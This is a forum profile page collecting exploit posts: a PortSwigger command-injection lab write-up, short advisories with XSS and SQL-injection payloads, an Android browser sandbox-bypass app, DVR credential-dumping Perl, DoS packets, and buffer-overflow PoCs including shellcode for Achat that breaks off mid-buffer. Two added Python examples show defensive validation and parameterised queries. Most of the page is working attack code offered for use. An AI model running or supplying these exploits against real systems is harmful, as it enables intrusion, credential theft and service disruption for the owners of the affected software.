
Everything posted by HireHackking
-
OS command injection, simple case – PortSwigger Write Up
In this post we are going to solve the PortSwigger lab "OS command injection, simple case". To solve the lab, we have to execute the whoami command on the server. To do that, we have to use the OS command injection found in the product stock check. So we go to any product on the site: Inside the chosen product, we can see that it has a section for checking stock: If we click it: It simply shows us the product's stock. Now, let's intercept the request the client makes when that button is clicked; at the same time, we set up Burp Suite to receive it: Once the request is intercepted, we send it to the Repeater by pressing Ctrl+R: As we can see, it is a normal request. However, let's try changing the value of storeId: We see an error from sh, which means the value of storeId is being passed to a Linux program. Knowing this, we can try a fairly simple OS command injection: In this case, simply using a semicolon to separate the value, so that what follows is treated as another command, is enough to isolate the whoami command from what came before and get it executed. This way, we solve the lab:
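The semicolon works above because the stock-check value is pasted into a command string that a shell then parses. The following Python example is added here and is not part of the PortSwigger lab or of this write-up; the back-end script name ./stock_check.sh and the sample submissions are constructed for illustration. It puts the vulnerable pattern beside the hardened one: strict numeric validation of productId and storeId, an argv list passed to subprocess without a shell, and a small detection helper that flags parameters carrying shell metacharacters, the way a rule over request logs would.

```python
import re
import subprocess

# Constructed stock-check submissions of the kind the lab's "check stock" button
# sends (productId and storeId form fields). The last two carry injected values.
SAMPLE_REQUESTS = [
    {"productId": "1", "storeId": "1"},
    {"productId": "1", "storeId": "1;whoami"},
    {"productId": "2", "storeId": "1 | id"},
]

# Characters that change how /bin/sh parses a line: command separators, pipes,
# redirection, command substitution, quoting and escaping.
SHELL_METACHARS = re.compile(r"[;&|`$(){}<>\n\r'\"\\]")

# Hypothetical back-end script; the lab write-up does not name the real one.
STOCK_SCRIPT = "./stock_check.sh"


def vulnerable_command(product_id, store_id):
    """The shape the lab exploits: untrusted values pasted into one shell string.
    A ';' in store_id ends the stock command and starts a second one."""
    return f"{STOCK_SCRIPT} {product_id} {store_id}"


def parse_numeric_id(value, name):
    """Allow-list validation: an id is a short run of decimal digits, nothing else."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError(f"{name} must be a decimal integer, got {value!r}")
    return int(value)


def safe_argv(product_id, store_id):
    """Validate both ids, then build an argv list so no shell ever parses them."""
    return [
        STOCK_SCRIPT,
        str(parse_numeric_id(product_id, "productId")),
        str(parse_numeric_id(store_id, "storeId")),
    ]


def run_stock_check(product_id, store_id):
    """Run the stock check without a shell (shell=False is subprocess's default);
    any metacharacter in an argument would reach the script as plain text."""
    return subprocess.run(safe_argv(product_id, store_id), capture_output=True, text=True)


def suspicious_params(params):
    """Detection helper for request logs: which parameters carry shell metacharacters."""
    return sorted(name for name, value in params.items() if SHELL_METACHARS.search(value))


def triage(requests):
    """Classify each submission as 'ok' or 'rejected' and list the flagged parameters."""
    results = []
    for params in requests:
        try:
            safe_argv(params["productId"], params["storeId"])
            results.append(("ok", []))
        except ValueError:
            results.append(("rejected", suspicious_params(params)))
    return results


if __name__ == "__main__":
    for params, (verdict, flagged) in zip(SAMPLE_REQUESTS, triage(SAMPLE_REQUESTS)):
        print(f"storeId={params['storeId']!r}: {verdict} {flagged}")
        print("  shell line the vulnerable pattern would hand to sh:",
              vulnerable_command(params["productId"], params["storeId"]))
```

The validation is an allow-list on purpose: rejecting a list of known-bad characters is fragile, while requiring the id to be digits leaves nothing for a shell to interpret, and passing an argv list means no shell is involved at all.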
-
Skype 5.3 - 'Mobile Phone' HTML Injection
source: https://www.securityfocus.com/bid/48951/info Skype is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. Skype 5.3.0.120 and prior are vulnerable; other versions may also be affected. The following sample input is available: "><iframe src='' onload=alert('mphone')> A video demonstrating the attack is available. Please see the references for more information.
-
Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass
source: https://www.securityfocus.com/bid/48954/info

Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox. Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain. Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected.

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class CasExploit extends Activity
{
    static final String mPackage = "com.android.browser";
    static final String mClass = "BrowserActivity";
    static final String mUrl = "http://target.domain/";
    static final String mJavascript = "alert(document.cookie)";
    static final int mSleep = 15000;

    @Override
    public void onCreate(Bundle savedInstanceState)
    {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        startBrowserActivity(mUrl);
        try {
            Thread.sleep(mSleep);
        } catch (InterruptedException e) {}
        startBrowserActivity("javascript:" + mJavascript);
    }

    private void startBrowserActivity(String url)
    {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(mPackage, mPackage + "." + mClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }
}
-
MyBB MyTabs Plugin - 'tab' SQL Injection
source: https://www.securityfocus.com/bid/48952/info The MyTabs plugin for MyBB is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
-
AzeoTech DaqFactory - Denial of Service
source: https://www.securityfocus.com/bid/48955/info

AzeoTech DAQFactory is prone to a denial-of-service vulnerability. Attackers can exploit this issue to cause the application to crash, denying service to legitimate users. Versions prior to DAQFactory 5.85 are vulnerable.

The following exploit requests are available:

preamble: "\x01\x00\x09\x00CPassword\x00"
reboot:   "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
shutdown: "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"
-
Gilnet News - 'read_more.php' SQL Injection
source: https://www.securityfocus.com/bid/48966/info Gilnet News is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. http://www.example.com/[PATH]/read_more.php?id=[Injection]
-
mt LinkDatenbank - 'b' Cross-Site Scripting
source: https://www.securityfocus.com/bid/48967/info mt LinkDatenbank is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/mt_linkdb/links.php?b=%22%3E%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E
-
BESNI OKUL PORTAL - 'sayfa.asp' Cross-Site Scripting
source: https://www.securityfocus.com/bid/48969/info BESNI OKUL PORTAL is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/[PATH]/sayfa.asp?islem=1&AltKategoriNo=42&AltKategoriAdi=<script>alert(document.domain)</script>
-
Joomla! Component com_xeslidegalfx - 'id' SQL Injection
source: https://www.securityfocus.com/bid/48981/info The 'Slideshow Gallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_xeslidegalfx&Itemid=&func=detail&id=1
-
Ataccan E-Ticaret Scripti - 'id' SQL Injection
source: https://www.securityfocus.com/bid/48970/info Ataccan E-ticaret scripti is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/name.asp?id=[SQLInjection]
-
foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution
source: https://www.securityfocus.com/bid/48982/info foomatic-gui is prone to a remote arbitrary shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary shell commands in the context of the application. Versions prior to foomatic-gui 0.7.9.5 are vulnerable. netbios name = oh'notquotezSIF to /etc/samba/smb.conf
-
LG DVR LE6016D - Remote Users/Passwords Disclosure
#!/usr/bin/perl
#
# LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
#
#
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
####
#
# Digital video recorder (DVR) surveillance is the use of cameras,
# often hidden or concealed, that use DVR technology to record
# video for playback or immediate viewing. As technological
# innovations have made improvements in the security and
# surveillance industry, DVR surveillance has become more
# prominent and allows for easier and more versatile security
# systems in homes and businesses. A DVR surveillance security
# system can be designed for indoor use or outdoor use and can
# often involve hidden security cameras, concealed “nanny cams”
# for home security, and even personal recording devices hidden
# on a person.
#
####
#
# Description:
# No authentication (login) is required to exploit this vulnerability.
# This program demonstrates how unpatched security bug would enable
# hackers to gain control of a vulnerable device while sitting
# behind their keyboard, potentially thousands of miles away.
# An unauthenticated attacker that is connected to the DVR's may be
# able to retrieve the device's administrator password allowing them
# to directly access the device's configuration control panel.
#
####
#
# Disclaimer:
# This or previous programs is for Educational purpose ONLY. Do not
# use it without permission.The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
####
# Use them at your own risk!
####
#
# $ perl lg.pl 133.7.133.7:80
#  LG DVR LE6016D unauthenticated remote
#  users/passwords disclosure exploit
#  u/p: admin/000000
#  u/p: user1/000000
#  u/p: user2/000000
#  u/p: user3/000000
#  u/p: LOGOUT/000000
#  Copyright 2015 (c) Todor Donev
#  <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#
####

use LWP::Simple;

print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";
if (@ARGV == 0) {&usg; &foot;}
while (@ARGV > 0) { $t = shift(@ARGV); }
my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
for (my $i=0; $i <= 4; $i++){
    if ($r =~ m/<name>(.*)<\/name>/g){
        print " u\/p: $1\/";
    }
    if ($r =~ m/<pw>(.*)<\/pw>/g){
        print "$1\n";
    }
}
&foot;

sub usg(){
    print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
}

sub foot(){
    print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n";
    print " http://www.ethical-hacker.org/\n";
    exit;
}
-
Joomla! Component com_community - 'userid' SQL Injection
source: https://www.securityfocus.com/bid/48983/info The 'com_community' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_community&view=profile&userid=156
-
WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Cross-Site Scripting
source: https://www.securityfocus.com/bid/49009/info

The WP e-Commerce plug-in for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WP e-Commerce 3.8.6 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/wp-e-commerce/wpsc-theme/wpsc-cart_widget.php?cart_messages[]=%3Cimg%20src=1%20onerror=javascript:alert%28document.cookie%29%3E
-
HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/49008/info

HESK is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. HESK 2.2 is vulnerable; other versions may also be affected.

http://www.example.com/inc/header.inc.php?hesk_settings[tmp_title]=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/header.inc.php?hesklang[ENCODING]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/assignment_search.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/attachments.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/common.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/database.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/prepare_ticket_search.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/print_tickets.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/show_admin_nav.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/show_search_form.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inc/ticket_list.inc.php?hesklang[attempt]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/language/en/text.php/%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
-
Xpdf 3.02-13 - 'zxpdf' Security Bypass
source: https://www.securityfocus.com/bid/49007/info

Xpdf is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization. Attackers can exploit this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.

$ touch y                              # The unrelated victim file
$ gzip -c </dev/null >'" y ".pdf.gz'   # Create a .pdf.gz file
$ xpdf '" y ".pdf.gz'                  # View it using xpdf
Error: May not be a PDF file (continuing anyway)
Error: PDF file is damaged - attempting to reconstruct xref table...
Error: Couldn't find trailer dictionary
Error: Couldn't read xref table
rm: cannot remove `/tmp/': Is a directory
$ ls -l y                              # The victim file is gone!
ls: cannot access y: No such file or directory
-
Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting
source: https://www.securityfocus.com/bid/49022/info Community Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Community Server 2007 and 2008 are vulnerable; other versions may also be affected. http://www.example.com/utility/TagSelector.aspx?TagEditor=[XSS]
-
Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/49033/info Microsoft Visual Studio is prone to multiple cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information. https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed=
-
RedaxScript CMS 2.2.0 - SQL Injection
# Exploit Title: Redaxscript CMS 2.2.0 - SQL Injection vulnerability
# Google Dork: N/A
# Date: 02/09/2015
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://redaxscript.com/
# Software Link: http://redaxscript.com/download/releases
# Version: Redaxscript 2.2.0
# Tested on: Linux
# CVE : CVE-2015-1518

:: PROOF OF CONCEPT ::

POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

search_terms=[SQL INJECTION HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_post=Search

- Vulnerable parameter: $search_terms
- Vulnerable file: redaxscript/includes/search.php
- Vulnerable function: search_post()
- Vulnerable code:

function search_post()
{
    /* clean post */

    if (ATTACK_BLOCKED < 10)
    {
        $search_terms = clean($_POST['search_terms'], 5);
    }

    /* validate post */

    if (strlen($search_terms) < 3 || $search_terms == l('search_terms'))
    {
        $error = l('input_incorrect');
    }

    /* query results */

    else
    {
        $search = array_filter(explode(' ', $search_terms));
        $search_keys = array_keys($search);
        $last = end($search_keys);

        /* query search */

        $query = 'SELECT id, title, alias, description, date, category, access FROM ' . PREFIX . 'articles WHERE (language = \'' . Redaxscript\Registry::get('language') . '\' || language = \'\') && status = 1';
        if ($search)
        {
            $query .= ' && (';
            foreach ($search as $key => $value)
            {
                $query .= 'title LIKE \'%' . $value . '%\' || description LIKE \'%' . $value . '%\' || keywords LIKE \'%' . $value . '%\' || text LIKE \'%' . $value . '%\'';
                if ($last != $key)
                {
                    $query .= ' || ';
                }
            }
            $query .= ')';
        }
        $query .= ' ORDER BY date DESC LIMIT 50';
        $result = Redaxscript\Db::forTablePrefix('articles')->rawQuery($query)->findArray();
        $num_rows = count($result);
        if ($result == '' || $num_rows == '')
        {
            $error = l('search_no');
        }

        /* collect output */

        else if ($result)
        {
            $accessValidator = new Redaxscript\Validator\Access();
            $output = '<h2 class="title_content title_search_result">' . l('search') . '</h2>';
            $output .= form_element('fieldset', '', 'set_search_result', '', '', '<span class="title_content_sub title_search_result_sub">' . l('articles') . '</span>') . '<ol class="list_search_result">';
            foreach ($result as $r)
            {
                $access = $r['access'];

                /* if access granted */

                if ($accessValidator->validate($access, MY_GROUPS) === Redaxscript\Validator\Validator::PASSED)
                {
                    if ($r)
                    {
                        foreach ($r as $key => $value)
                        {
                            $$key = stripslashes($value);
                        }
                    }

                    /* prepare metadata */

                    if ($description == '')
                    {
                        $description = $title;
                    }
                    $date = date(s('date'), strtotime($date));

                    /* build route */

                    if ($category == 0)
                    {
                        $route = $alias;
                    }
                    else
                    {
                        $route = build_route('articles', $id);
                    }

                    /* collect item output */

                    $output .= '<li class="item_search_result">' . anchor_element('internal', '', 'link_search_result', $title, $route, $description) . '<span class="date_search_result">' . $date . '</span></li>';
                }
                else
                {
                    $counter++;
                }
            }
            $output .= '</ol></fieldset>';

            /* handle access */

            if ($num_rows == $counter)
            {
                $error = l('access_no');
            }
        }
    }

    /* handle error */

    if ($error)
    {
        notification(l('something_wrong'), $error);
    }
    else
    {
        echo $output;
    }
}

:: SOLUTION ::

Update to Redaxscript 2.3.0

:: INFORMATION DISCLOSURE ::

- 11/27/2014: Inform the vendor
- 11/28/2014: Vendor confirmed
- 01/29/2015: Vendor releases patch
- 01/05/2015: ITAS Team publishes information

:: REFERENCE ::

- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-redaxscript-2-2-0-cms-75.html

:: COPYRIGHT ::

Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn).

:: DISCLAIMER ::

THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
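The defect in search_post() is that each search term is concatenated into a LIKE '%...%' literal, so quotes and comment markers in the term become SQL. Redaxscript's own code is PHP; the following added Python/sqlite3 example is not from the advisory or the project, and its articles table and inputs are constructed stand-ins. It reproduces the same tokenisation and query shape in a vulnerable version and a parameterised one, and runs both against the same rows so the difference is visible: an apostrophe breaks the concatenated query, a crafted term returns the unpublished row, and the bound-parameter version treats both as literal text.

```python
import sqlite3

# Constructed stand-in for Redaxscript's articles table (id, title, description,
# status, access); the real schema has more columns. Row 3 is unpublished (status 0).
ARTICLES = [
    (1, "Public notes", "general notes for everyone", 1, 1),
    (2, "Staff handbook", "internal procedures", 1, 0),
    (3, "Draft post", "not yet published", 0, 1),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER, title TEXT, description TEXT, status INTEGER, access INTEGER)"
    )
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?, ?, ?)", ARTICLES)
    return conn


def split_terms(search_terms):
    """Same tokenisation as the advisory's code: explode on spaces, drop empties."""
    return [t for t in search_terms.split(" ") if t]


def vulnerable_search(conn, search_terms):
    """Mirrors search_post(): every term is pasted into LIKE '%...%' by concatenation,
    so a quote or a comment marker inside the term rewrites the statement."""
    query = "SELECT id FROM articles WHERE status = 1"
    terms = split_terms(search_terms)
    if terms:
        query += " AND (" + " OR ".join(
            f"title LIKE '%{t}%' OR description LIKE '%{t}%'" for t in terms
        ) + ")"
    query += " ORDER BY id"
    return sorted(row[0] for row in conn.execute(query))


def escape_like(term):
    """Escape LIKE wildcards so a user term matches literally (paired with ESCAPE below)."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def safe_search(conn, search_terms):
    """Same query shape, but each term travels as a bound parameter: the SQL text is
    fixed and the database never parses user input as syntax."""
    query = "SELECT id FROM articles WHERE status = 1"
    params = []
    terms = split_terms(search_terms)
    if terms:
        clauses = []
        for t in terms:
            pattern = "%" + escape_like(t) + "%"
            clauses.append("title LIKE ? ESCAPE '\\' OR description LIKE ? ESCAPE '\\'")
            params.extend([pattern, pattern])
        query += " AND (" + " OR ".join(clauses) + ")"
    query += " ORDER BY id"
    return sorted(row[0] for row in conn.execute(query, params))


def compare(search_terms):
    """Run both versions on a fresh database; a syntax error from the vulnerable
    version is reported as a string instead of propagating."""
    conn = make_db()
    try:
        vulnerable = vulnerable_search(conn, search_terms)
    except sqlite3.OperationalError:
        vulnerable = "syntax error"
    return {"vulnerable": vulnerable, "safe": safe_search(conn, search_terms)}


if __name__ == "__main__":
    # Constructed inputs: a normal term, a term with an apostrophe, and a term that
    # closes the LIKE literal and comments out the remainder of the statement.
    for term in ["notes", "O'Reilly", "x%')OR(1=1)--"]:
        print(f"{term!r}: {compare(term)}")
```

The syntax error on O'Reilly is the symptom a defender should watch for in application logs: a database error triggered by ordinary punctuation in user input means the input is reaching the parser as syntax. Note that parameter binding does not escape LIKE wildcards, which is why escape_like and the ESCAPE clause are still needed for a literal match.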
-
MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (PoC)
#!/usr/bin/env python
##########################################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC
# Date Discovered: 09-02-2015
# Exploit Author: Samandeep Singh ( SaMaN - @samanL33T )
# Vulnerable Software: Moo player 1.3.0
# Software Link: https://mooplayer.jaleco.com/
# Vendor site: https://mooplayer.jaleco.com/
# Version: 1.3.0
# Tested On: Windows XP SP3, Win 7 x86.
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this:
# 01DDF92C   ntdll.76FF71CD
# 01DDFF5C   43434343
# 42424242   *** CORRUPT ENTRY ***
#
# And the Stack
# 01DDFF44   41414141  AAAA
# 01DDFF48   41414141  AAAA
# 01DDFF4C   41414141  AAAA
# 01DDFF50   41414141  AAAA
# 01DDFF54   41414141  AAAA
# 01DDFF58   41414141  AAAA
# 01DDFF5C   42424242  BBBB  Pointer to next SEH record
# 01DDFF60   43434343  CCCC  SE handler
# 01DDFF64   00000000  ....
# 01DDFF68   44444444  DDDD
# 01DDFF6C   44444444  DDDD
# 01DDFF70   44444444  DDDD
#
# And the Registers
# EAX 00000000
# ECX 43434343
# EDX 76FF71CD ntdll.76FF71CD
# EBX 00000000
# ESP 01DDF918
# EBP 01DDF938
# ESI 00000000
# EDI 00000000
# EIP 43434343

head="http://"
buffer=10000
junk="\x41" * 264
nseh = "\x42" * 4
seh = "\x43" * 4
poc = head + junk + nseh + seh
junk1 = "\x44"*(buffer-len(poc))
poc += junk1

file = "mooplay_poc.m3u"
f=open(file,"w")
f.write(head + poc);
f.close();

#SaMaN(@samanL33T)
-
Achat 0.150 beta7 - Remote Buffer Overflow
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
